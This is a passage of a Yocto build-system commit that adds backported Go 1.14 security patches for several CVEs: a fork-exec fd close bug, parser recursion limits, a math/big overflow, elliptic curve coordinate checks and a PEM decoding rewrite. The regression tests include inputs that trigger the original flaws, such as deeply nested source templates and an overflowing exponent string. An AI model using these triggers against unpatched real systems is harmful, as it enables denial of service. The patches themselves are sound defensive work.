+syscall: fix ForkLock spurious close(0) on pipe failure
+Pipe (and therefore forkLockPipe) does not make any guarantees
+about the state of p after a failed Pipe(p). Avoid that assumption
+and the too-clever goto, so that we don't accidentally Close a real fd
+if the failed pipe leaves p[0] or p[1] set >= 0.
+
+Updates #50057
+Fixes CVE-2021-44717
+
+Change-Id: Iff8e19a6efbba0c73cc8b13ecfae381c87600bb4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1291270
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370514
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+---
+ src/syscall/exec_unix.go | 20 ++++++--------------
+ 1 file changed, 6 insertions(+), 14 deletions(-)
+
+diff --git a/src/syscall/exec_unix.go b/src/syscall/exec_unix.go
+index b3798b6..b73782c 100644
+--- a/src/syscall/exec_unix.go
++++ b/src/syscall/exec_unix.go
+@@ -151,9 +151,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+ sys = &zeroSysProcAttr
+ }
+
+- p[0] = -1
+- p[1] = -1
+-
+ // Convert args to C form.
+ argv0p, err := BytePtrFromString(argv0)
+ if err != nil {
+@@ -194,14 +191,17 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+
+ // Allocate child status pipe close on exec.
+ if err = forkExecPipe(p[:]); err != nil {
+- goto error
++ ForkLock.Unlock()
++ return 0, err
+ }
+
+ // Kick off child.
+ pid, err1 = forkAndExecInChild(argv0p, argvp, envvp, chroot, dir, attr, sys, p[1])
+ if err1 != 0 {
+- err = Errno(err1)
+- goto error
++ Close(p[0])
++ Close(p[1])
++ ForkLock.Unlock()
++ return 0, Errno(err1)
+ }
+ ForkLock.Unlock()
+
+@@ -228,14 +228,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+
+ // Read got EOF, so pipe closed on exec, so exec succeeded.
+ return pid, nil
+-
+-error:
+- if p[0] >= 0 {
+- Close(p[0])
+- Close(p[1])
+- }
+- ForkLock.Unlock()
+- return 0, err
+ }
+
+ // Combination of fork and exec, careful to be thread safe.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
new file mode 100644
index 0000000000..b2ab5d0669
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
@@ -0,0 +1,357 @@
+From ba8788ebcead55e99e631c6a1157ad7b35535d11 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 15 Jun 2022 10:43:05 -0700
+Subject: [PATCH] [release-branch.go1.17] go/parser: limit recursion depth
+
+Limit nested parsing to 100,000, which prevents stack exhaustion when
+parsing deeply nested statements, types, and expressions. Also limit
+the scope depth to 1,000 during object resolution.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #53707
+Updates #53616
+Fixes CVE-2022-1962
+
+Change-Id: I4d7b86c1d75d0bf3c7af1fdea91582aa74272c64
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1491025
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 6a856f08d58e4b6705c0c337d461c540c1235c83)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417070
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ba8788ebcead55e99e631c6a1157ad7b35535d11]
+CVE: CVE-2022-1962
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/interface.go | 10 ++-
+ src/go/parser/parser.go | 48 ++++++++--
+ src/go/parser/parser_test.go | 169 +++++++++++++++++++++++++++++++++++
+ 3 files changed, 220 insertions(+), 7 deletions(-)
+
+diff --git a/src/go/parser/interface.go b/src/go/parser/interface.go
+index 54f9d7b..537b327 100644
+--- a/src/go/parser/interface.go
++++ b/src/go/parser/interface.go
+@@ -92,8 +92,11 @@ func ParseFile(fset *token.FileSet, filename string, src interface{}, mode Mode)
+ defer func() {
+ if e := recover(); e != nil {
+ // resume same panic if it's not a bailout
+- if _, ok := e.(bailout); !ok {
++ bail, ok := e.(bailout)
++ if !ok {
+ panic(e)
++ } else if bail.msg != "" {
++ p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ }
+ }
+
+@@ -188,8 +191,11 @@ func ParseExprFrom(fset *token.FileSet, filename string, src interface{}, mode M
+ defer func() {
+ if e := recover(); e != nil {
+ // resume same panic if it's not a bailout
+- if _, ok := e.(bailout); !ok {
++ bail, ok := e.(bailout)
++ if !ok {
+ panic(e)
++ } else if bail.msg != "" {
++ p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ }
+ }
+ p.errors.Sort()
+diff --git a/src/go/parser/parser.go b/src/go/parser/parser.go
+index 31a7398..586fe90 100644
+--- a/src/go/parser/parser.go
++++ b/src/go/parser/parser.go
+@@ -64,6 +64,10 @@ type parser struct {
+ unresolved []*ast.Ident // unresolved identifiers
+ imports []*ast.ImportSpec // list of imports
+
++ // nestLev is used to track and limit the recursion depth
++ // during parsing.
++ nestLev int
++
+ // Label scopes
+ // (maintained by open/close LabelScope)
+ labelScope *ast.Scope // label scope for current function
+@@ -236,6 +240,24 @@ func un(p *parser) {
+ p.printTrace(")")
+ }
+
++// maxNestLev is the deepest we're willing to recurse during parsing
++const maxNestLev int = 1e5
++
++func incNestLev(p *parser) *parser {
++ p.nestLev++
++ if p.nestLev > maxNestLev {
++ p.error(p.pos, "exceeded max nesting depth")
++ panic(bailout{})
++ }
++ return p
++}
++
++// decNestLev is used to track nesting depth during parsing to prevent stack exhaustion.
++// It is used along with incNestLev in a similar fashion to how un and trace are used.
++func decNestLev(p *parser) {
++ p.nestLev--
++}
++
+ // Advance to the next token.
+ func (p *parser) next0() {
+ // Because of one-token look-ahead, print the previous token
+@@ -348,8 +370,12 @@ func (p *parser) next() {
+ }
+ }
+
+-// A bailout panic is raised to indicate early termination.
+-type bailout struct{}
++// A bailout panic is raised to indicate early termination. pos and msg are
++// only populated when bailing out of object resolution.
++type bailout struct {
++ pos token.Pos
++ msg string
++}
+
+ func (p *parser) error(pos token.Pos, msg string) {
+ epos := p.file.Position(pos)
+@@ -1030,6 +1056,8 @@ func (p *parser) parseChanType() *ast.ChanType {
+
+ // If the result is an identifier, it is not resolved.
+ func (p *parser) tryIdentOrType() ast.Expr {
++ defer decNestLev(incNestLev(p))
++
+ switch p.tok {
+ case token.IDENT:
+ return p.parseTypeName()
+@@ -1609,7 +1637,13 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ }
+
+ x := p.parseUnaryExpr(lhs)
+- for {
++ // We track the nesting here rather than at the entry for the function,
++ // since it can iteratively produce a nested output, and we want to
++ // limit how deep a structure we generate.
++ var n int
++ defer func() { p.nestLev -= n }()
++ for n = 1; ; n++ {
++ incNestLev(p)
+ op, oprec := p.tokPrec()
+ if oprec < prec1 {
+ return x
+@@ -1628,7 +1662,7 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ // The result may be a type or even a raw type ([...]int). Callers must
+ // check the result (using checkExpr or checkExprOrType), depending on
+ // context.
+-func (p *parser) parseExpr(lhs bool) ast.Expr {
++func (p *parser) parseExpr(lhs bool) ast.Expr {
+ if p.trace {
+ defer un(trace(p, "Expression"))
+ }
+@@ -1899,6 +1933,8 @@ func (p *parser) parseIfHeader() (init ast.Stmt, cond ast.Expr) {
+ }
+
+ func (p *parser) parseIfStmt() *ast.IfStmt {
++ defer decNestLev(incNestLev(p))
++
+ if p.trace {
+ defer un(trace(p, "IfStmt"))
+ }
+@@ -2214,6 +2250,8 @@ func (p *parser) parseForStmt() ast.Stmt {
+ }
+
+ func (p *parser) parseStmt() (s ast.Stmt) {
++ defer decNestLev(incNestLev(p))
++
+ if p.trace {
+ defer un(trace(p, "Statement"))
+ }
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 25a374e..37a6a2b 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -10,6 +10,7 @@ import (
+ "go/ast"
+ "go/token"
+ "os"
++ "runtime"
+ "strings"
+ "testing"
+ )
+@@ -569,3 +570,171 @@ type x int // comment
+ t.Errorf("got %q, want %q", comment, "// comment")
+ }
+ }
++
++var parseDepthTests = []struct {
++ name string
++ format string
++ // multipler is used when a single statement may result in more than one
++ // change in the depth level, for instance "1+(..." produces a BinaryExpr
++ // followed by a UnaryExpr, which increments the depth twice. The test
++ // case comment explains which nodes are triggering the multiple depth
++ // changes.
++ parseMultiplier int
++ // scope is true if we should also test the statement for the resolver scope
++ // depth limit.
++ scope bool
++ // scopeMultiplier does the same as parseMultiplier, but for the scope
++ // depths.
++ scopeMultiplier int
++}{
++ // The format expands the part inside « » many times.
++ // A second set of brackets nested inside the first stops the repetition,
++ // so that for example «(«1»)» expands to (((...((((1))))...))).
++ {name: "array", format: "package main; var x «[1]»int"},
++ {name: "slice", format: "package main; var x «[]»int"},
++ {name: "struct", format: "package main; var x «struct { X «int» }»", scope: true},
++ {name: "pointer", format: "package main; var x «*»int"},
++ {name: "func", format: "package main; var x «func()»int", scope: true},
++ {name: "chan", format: "package main; var x «chan »int"},
++ {name: "chan2", format: "package main; var x «<-chan »int"},
++ {name: "interface", format: "package main; var x «interface { M() «int» }»", scope: true, scopeMultiplier: 2}, // Scopes: InterfaceType, FuncType
++ {name: "map", format: "package main; var x «map[int]»int"},
++ {name: "slicelit", format: "package main; var x = «[]any{«»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "arraylit", format: "package main; var x = «[1]any{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "structlit", format: "package main; var x = «struct{x any}{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "maplit", format: "package main; var x = «map[int]any{1:«nil»}»", parseMultiplier: 2}, // Parser nodes: CompositeLit, KeyValueExpr
++ {name: "dot", format: "package main; var x = «x.»x"},
++ {name: "index", format: "package main; var x = x«[1]»"},
++ {name: "slice", format: "package main; var x = x«[1:2]»"},
++ {name: "slice3", format: "package main; var x = x«[1:2:3]»"},
++ {name: "dottype", format: "package main; var x = x«.(any)»"},
++ {name: "callseq", format: "package main; var x = x«()»"},
++ {name: "methseq", format: "package main; var x = x«.m()»", parseMultiplier: 2}, // Parser nodes: SelectorExpr, CallExpr
++ {name: "binary", format: "package main; var x = «1+»1"},
++ {name: "binaryparen", format: "package main; var x = «1+(«1»)»", parseMultiplier: 2}, // Parser nodes: BinaryExpr, ParenExpr
++ {name: "unary", format: "package main; var x = «^»1"},
++ {name: "addr", format: "package main; var x = «& »x"},
++ {name: "star", format: "package main; var x = «*»x"},
++ {name: "recv", format: "package main; var x = «<-»x"},
++ {name: "call", format: "package main; var x = «f(«1»)»", parseMultiplier: 2}, // Parser nodes: Ident, CallExpr
++ {name: "conv", format: "package main; var x = «(*T)(«1»)»", parseMultiplier: 2}, // Parser nodes: ParenExpr, CallExpr
++ {name: "label", format: "package main; func main() { «Label:» }"},
++ {name: "if", format: "package main; func main() { «if true { «» }»}", parseMultiplier: 2, scope: true, scopeMultiplier: 2}, // Parser nodes: IfStmt, BlockStmt. Scopes: IfStmt, BlockStmt
++ {name: "ifelse", format: "package main; func main() { «if true {} else » {} }", scope: true},
++ {name: "switch", format: "package main; func main() { «switch { default: «» }»}", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
++ {name: "typeswitch", format: "package main; func main() { «switch x.(type) { default: «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
++ {name: "for0", format: "package main; func main() { «for { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "for1", format: "package main; func main() { «for x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "for3", format: "package main; func main() { «for f(); g(); h() { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "forrange0", format: "package main; func main() { «for range x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "forrange1", format: "package main; func main() { «for x = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "forrange2", format: "package main; func main() { «for x, y = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "go", format: "package main; func main() { «go func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: GoStmt, FuncLit
++ {name: "defer", format: "package main; func main() { «defer func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: DeferStmt, FuncLit
++ {name: "select", format: "package main; func main() { «select { default: «» }» }", scope: true},
++}
++
++// split splits pre«mid»post into pre, mid, post.
++// If the string does not have that form, split returns x, "", "".
++func split(x string) (pre, mid, post string) {
++ start, end := strings.Index(x, "«"), strings.LastIndex(x, "»")
++ if start < 0 || end < 0 {
++ return x, "", ""
++ }
++ return x[:start], x[start+len("«") : end], x[end+len("»"):]
++}
++
++func TestParseDepthLimit(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes call stack exhaustion on js/wasm")
++ }
++ for _, tt := range parseDepthTests {
++ for _, size := range []string{"small", "big"} {
++ t.Run(tt.name+"/"+size, func(t *testing.T) {
++ n := maxNestLev + 1
++ if tt.parseMultiplier > 0 {
++ n /= tt.parseMultiplier
++ }
++ if size == "small" {
++ // Decrease the number of statements by 10, in order to check
++ // that we do not fail when under the limit. 10 is used to
++ // provide some wiggle room for cases where the surrounding
++ // scaffolding syntax adds some noise to the depth that changes
++ // on a per testcase basis.
++ n -= 10
++ }
++
++ pre, mid, post := split(tt.format)
++ if strings.Contains(mid, "«") {
++ left, base, right := split(mid)
++ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++ } else {
++ mid = strings.Repeat(mid, n)
++ }
++ input := pre + mid + post
++
++ fset := token.NewFileSet()
++ _, err := ParseFile(fset, "", input, ParseComments|SkipObjectResolution)
++ if size == "small" {
++ if err != nil {
++ t.Errorf("ParseFile(...): %v (want success)", err)
++ }
++ } else {
++ expected := "exceeded max nesting depth"
++ if err == nil || !strings.HasSuffix(err.Error(), expected) {
++ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++ }
++ }
++ })
++ }
++ }
++}
++
++func TestScopeDepthLimit(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes call stack exhaustion on js/wasm")
++ }
++ for _, tt := range parseDepthTests {
++ if !tt.scope {
++ continue
++ }
++ for _, size := range []string{"small", "big"} {
++ t.Run(tt.name+"/"+size, func(t *testing.T) {
++ n := maxScopeDepth + 1
++ if tt.scopeMultiplier > 0 {
++ n /= tt.scopeMultiplier
++ }
++ if size == "small" {
++ // Decrease the number of statements by 10, in order to check
++ // that we do not fail when under the limit. 10 is used to
++ // provide some wiggle room for cases where the surrounding
++ // scaffolding syntax adds some noise to the depth that changes
++ // on a per testcase basis.
++ n -= 10
++ }
++
++ pre, mid, post := split(tt.format)
++ if strings.Contains(mid, "«") {
++ left, base, right := split(mid)
++ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++ } else {
++ mid = strings.Repeat(mid, n)
++ }
++ input := pre + mid + post
++
++ fset := token.NewFileSet()
++ _, err := ParseFile(fset, "", input, DeclarationErrors)
++ if size == "small" {
++ if err != nil {
++ t.Errorf("ParseFile(...): %v (want success)", err)
++ }
++ } else {
++ expected := "exceeded max scope depth during object resolution"
++ if err == nil || !strings.HasSuffix(err.Error(), expected) {
++ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++ }
++ }
++ })
++ }
++ }
++}
+--
+2.30.2
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
new file mode 100644
index 0000000000..f0daee3624
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
@@ -0,0 +1,50 @@
+From 70882eedccac803ddcf1c3215e0ae8fd59847e39 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Sat, 26 Feb 2022 20:03:38 +0000
+Subject: [PATCH] [release-branch.go1.16] math/big: prevent overflow in
+ (*Rat).SetString
+
+Credit to rsc@ for the original patch.
+
+Thanks to the OSS-Fuzz project for discovering this
+issue and to Emmanuel Odeke (@odeke_et) for reporting it.
+
+Updates #50699
+Fixes #50700
+Fixes CVE-2022-23772
+---
+ src/math/big/ratconv.go | 5 +++++
+ src/math/big/ratconv_test.go | 1 +
+ 2 files changed, 6 insertions(+)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index 941139e..e8cbdbe 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -168,6 +168,11 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ n := exp5
+ if n < 0 {
+ n = -n
++ if n < 0 {
++ // This can occur if -n overflows. -(-1 << 63) would become
++ // -1 << 63, which is still negative.
++ return nil, false
++ }
+ }
+ pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ if exp5 > 0 {
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index ba0d1ba..b820df4 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -104,6 +104,7 @@ var setStringTests = []StringTest{
+ {in: "4/3/"},
+ {in: "4/3."},
+ {in: "4/"},
++ {in: "13e-9223372036854775808"}, // CVE-2022-23772
+
+ // valid
+ {"0", "0", true},
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
new file mode 100644
index 0000000000..772acdcbf6
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
@@ -0,0 +1,142 @@
+From 5b376a209d1c61e10847e062d78c4b1aa90dff0c Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Sat, 26 Feb 2022 10:40:57 +0000
+Subject: [PATCH] crypto/elliptic: make IsOnCurve return false for invalid
+
+ field elements
+
+Updates #50974
+Fixes #50977
+Fixes CVE-2022-23806
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ src/crypto/elliptic/elliptic.go | 6 +++
+ src/crypto/elliptic/elliptic_test.go | 81 ++++++++++++++++++++++++++++
+ src/crypto/elliptic/p224.go | 6 +++
+ 3 files changed, 93 insertions(+)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cd..bd574a4 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -53,6 +53,12 @@ func (curve *CurveParams) Params() *CurveParams {
+ }
+
+ func (curve *CurveParams) IsOnCurve(x, y *big.Int) bool {
++
++ if x.Sign() < 0 || x.Cmp(curve.P) >= 0 ||
++ y.Sign() < 0 || y.Cmp(curve.P) >= 0 {
++ return false
++ }
++
+ // y² = x³ - 3x + b
+ y2 := new(big.Int).Mul(y, y)
+ y2.Mod(y2, curve.P)
+diff --git a/src/crypto/elliptic/elliptic_test.go b/src/crypto/elliptic/elliptic_test.go
+index 09c5483..b13a620 100644
+--- a/src/crypto/elliptic/elliptic_test.go
++++ b/src/crypto/elliptic/elliptic_test.go
+@@ -628,3 +628,84 @@ func TestUnmarshalToLargeCoordinates(t *testing.T) {
+ t.Errorf("Unmarshal accepts invalid Y coordinate")
+ }
+ }
++
++func testAllCurves(t *testing.T, f func(*testing.T, Curve)) {
++ tests := []struct {
++ name string
++ curve Curve
++ }{
++ {"P256", P256()},
++ {"P256/Params", P256().Params()},
++ {"P224", P224()},
++ {"P224/Params", P224().Params()},
++ {"P384", P384()},
++ {"P384/Params", P384().Params()},
++ {"P521", P521()},
++ {"P521/Params", P521().Params()},
++ }
++ if testing.Short() {
++ tests = tests[:1]
++ }
++ for _, test := range tests {
++ curve := test.curve
++ t.Run(test.name, func(t *testing.T) {
++ t.Parallel()
++ f(t, curve)
++ })
++ }
++}
++
++// TestInvalidCoordinates tests big.Int values that are not valid field elements
++// (negative or bigger than P). They are expected to return false from
++// IsOnCurve, all other behavior is undefined.
++func TestInvalidCoordinates(t *testing.T) {
++ testAllCurves(t, testInvalidCoordinates)
++}
++
++func testInvalidCoordinates(t *testing.T, curve Curve) {
++ checkIsOnCurveFalse := func(name string, x, y *big.Int) {
++ if curve.IsOnCurve(x, y) {
++ t.Errorf("IsOnCurve(%s) unexpectedly returned true", name)
++ }
++ }
++
++ p := curve.Params().P
++ _, x, y, _ := GenerateKey(curve, rand.Reader)
++ xx, yy := new(big.Int), new(big.Int)
++
++ // Check if the sign is getting dropped.
++ xx.Neg(x)
++ checkIsOnCurveFalse("-x, y", xx, y)
++ yy.Neg(y)
++ checkIsOnCurveFalse("x, -y", x, yy)
++
++ // Check if negative values are reduced modulo P.
++ xx.Sub(x, p)
++ checkIsOnCurveFalse("x-P, y", xx, y)
++ yy.Sub(y, p)
++ checkIsOnCurveFalse("x, y-P", x, yy)
++
++ // Check if positive values are reduced modulo P.
++ xx.Add(x, p)
++ checkIsOnCurveFalse("x+P, y", xx, y)
++ yy.Add(y, p)
++ checkIsOnCurveFalse("x, y+P", x, yy)
++
++ // Check if the overflow is dropped.
++ xx.Add(x, new(big.Int).Lsh(big.NewInt(1), 535))
++ checkIsOnCurveFalse("x+2⁵³⁵, y", xx, y)
++ yy.Add(y, new(big.Int).Lsh(big.NewInt(1), 535))
++ checkIsOnCurveFalse("x, y+2⁵³⁵", x, yy)
++
++ // Check if P is treated like zero (if possible).
++ // y^2 = x^3 - 3x + B
++ // y = mod_sqrt(x^3 - 3x + B)
++ // y = mod_sqrt(B) if x = 0
++ // If there is no modsqrt, there is no point with x = 0, can't test x = P.
++ if yy := new(big.Int).ModSqrt(curve.Params().B, p); yy != nil {
++ if !curve.IsOnCurve(big.NewInt(0), yy) {
++ t.Fatal("(0, mod_sqrt(B)) is not on the curve?")
++ }
++ checkIsOnCurveFalse("P, y", p, yy)
++ }
++}
+diff --git a/src/crypto/elliptic/p224.go b/src/crypto/elliptic/p224.go
+index 8c76021..f1bfd7e 100644
+--- a/src/crypto/elliptic/p224.go
++++ b/src/crypto/elliptic/p224.go
+@@ -48,6 +48,12 @@ func (curve p224Curve) Params() *CurveParams {
+ }
+
+ func (curve p224Curve) IsOnCurve(bigX, bigY *big.Int) bool {
++
++ if bigX.Sign() < 0 || bigX.Cmp(curve.P) >= 0 ||
++ bigY.Sign() < 0 || bigY.Cmp(curve.P) >= 0 {
++ return false
++ }
++
+ var x, y p224FieldElement
+ p224FromBig(&x, bigX)
+ p224FromBig(&y, bigY)
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
new file mode 100644
index 0000000000..4bc012be21
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
@@ -0,0 +1,271 @@
+From 1eb931d60a24501a9668e5cb4647593e19115507 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 12:22:53 +0530
+Subject: [PATCH] CVE-2022-24675
+
+Upstream-Status: Backport [https://go-review.googlesource.com/c/go/+/399816/]
+CVE: CVE-2022-24675
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/pem/pem.go | 174 +++++++++++++++--------------------
+ src/encoding/pem/pem_test.go | 28 +++++-
+ 2 files changed, 101 insertions(+), 101 deletions(-)
+
+diff --git a/src/encoding/pem/pem.go b/src/encoding/pem/pem.go
+index a7272da..1bee1c1 100644
+--- a/src/encoding/pem/pem.go
++++ b/src/encoding/pem/pem.go
+@@ -87,123 +87,97 @@ func Decode(data []byte) (p *Block, rest []byte) {
+ // pemStart begins with a newline. However, at the very beginning of
+ // the byte array, we'll accept the start string without it.
+ rest = data
+- if bytes.HasPrefix(data, pemStart[1:]) {
+- rest = rest[len(pemStart)-1 : len(data)]
+- } else if i := bytes.Index(data, pemStart); i >= 0 {
+- rest = rest[i+len(pemStart) : len(data)]
+- } else {
+- return nil, data
+- }
+-
+- typeLine, rest := getLine(rest)
+- if !bytes.HasSuffix(typeLine, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
+- typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+-
+- p = &Block{
+- Headers: make(map[string]string),
+- Type: string(typeLine),
+- }
+-
+ for {
+- // This loop terminates because getLine's second result is
+- // always smaller than its argument.
+- if len(rest) == 0 {
++ if bytes.HasPrefix(rest, pemStart[1:]) {
++ rest = rest[len(pemStart)-1:]
++ } else if i := bytes.Index(rest, pemStart); i >= 0 {
++ rest = rest[i+len(pemStart) : len(rest)]
++ } else {
+ return nil, data
+ }
+- line, next := getLine(rest)
+
+- i := bytes.IndexByte(line, ':')
+- if i == -1 {
+- break
++ var typeLine []byte
++ typeLine, rest = getLine(rest)
++ if !bytes.HasSuffix(typeLine, pemEndOfLine) {
++ continue
+ }
++ typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+
+- // TODO(agl): need to cope with values that spread across lines.
+- key, val := line[:i], line[i+1:]
+- key = bytes.TrimSpace(key)
+- val = bytes.TrimSpace(val)
+- p.Headers[string(key)] = string(val)
+- rest = next
+- }
++ p = &Block{
++ Headers: make(map[string]string),
++ Type: string(typeLine),
++ }
+
+- var endIndex, endTrailerIndex int
++ for {
++ // This loop terminates because getLine's second result is
++ // always smaller than its argument.
++ if len(rest) == 0 {
++ return nil, data
++ }
++ line, next := getLine(rest)
+
+- // If there were no headers, the END line might occur
+- // immediately, without a leading newline.
+- if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
+- endIndex = 0
+- endTrailerIndex = len(pemEnd) - 1
+- } else {
+- endIndex = bytes.Index(rest, pemEnd)
+- endTrailerIndex = endIndex + len(pemEnd)
+- }
++ i := bytes.IndexByte(line, ':')
++ if i == -1 {
++ break
++ }
+
+- if endIndex < 0 {
+- return decodeError(data, rest)
+- }
++ // TODO(agl): need to cope with values that spread across lines.
++ key, val := line[:i], line[i+1:]
++ key = bytes.TrimSpace(key)
++ val = bytes.TrimSpace(val)
++ p.Headers[string(key)] = string(val)
++ rest = next
++ }
+
+- // After the "-----" of the ending line, there should be the same type
+- // and then a final five dashes.
+- endTrailer := rest[endTrailerIndex:]
+- endTrailerLen := len(typeLine) + len(pemEndOfLine)
+- if len(endTrailer) < endTrailerLen {
+- return decodeError(data, rest)
+- }
++ var endIndex, endTrailerIndex int
+
+- restOfEndLine := endTrailer[endTrailerLen:]
+- endTrailer = endTrailer[:endTrailerLen]
+- if !bytes.HasPrefix(endTrailer, typeLine) ||
+- !bytes.HasSuffix(endTrailer, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
++ // If there were no headers, the END line might occur
++ // immediately, without a leading newline.
++ if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
++ endIndex = 0
++ endTrailerIndex = len(pemEnd) - 1
++ } else {
++ endIndex = bytes.Index(rest, pemEnd)
++ endTrailerIndex = endIndex + len(pemEnd)
++ }
+
+- // The line must end with only whitespace.
+- if s, _ := getLine(restOfEndLine); len(s) != 0 {
+- return decodeError(data, rest)
+- }
++ if endIndex < 0 {
++ continue
++ }
+
+- base64Data := removeSpacesAndTabs(rest[:endIndex])
+- p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
+- n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
+- if err != nil {
+- return decodeError(data, rest)
+- }
+- p.Bytes = p.Bytes[:n]
++ // After the "-----" of the ending line, there should be the same type
++ // and then a final five dashes.
++ endTrailer := rest[endTrailerIndex:]
++ endTrailerLen := len(typeLine) + len(pemEndOfLine)
++ if len(endTrailer) < endTrailerLen {
++ continue
++ }
++
++ restOfEndLine := endTrailer[endTrailerLen:]
++ endTrailer = endTrailer[:endTrailerLen]
++ if !bytes.HasPrefix(endTrailer, typeLine) ||
++ !bytes.HasSuffix(endTrailer, pemEndOfLine) {
++ continue
++ }
+
+- // the -1 is because we might have only matched pemEnd without the
+- // leading newline if the PEM block was empty.
+- _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ // The line must end with only whitespace.
++ if s, _ := getLine(restOfEndLine); len(s) != 0 {
++ continue
++ }
+
+- return
+-}
++ base64Data := removeSpacesAndTabs(rest[:endIndex])
++ p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
++ n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
++ if err != nil {
++ continue
++ }
++ p.Bytes = p.Bytes[:n]
+
+-func decodeError(data, rest []byte) (*Block, []byte) {
+- // If we get here then we have rejected a likely looking, but
+- // ultimately invalid PEM block. We need to start over from a new
+- // position. We have consumed the preamble line and will have consumed
+- // any lines which could be header lines. However, a valid preamble
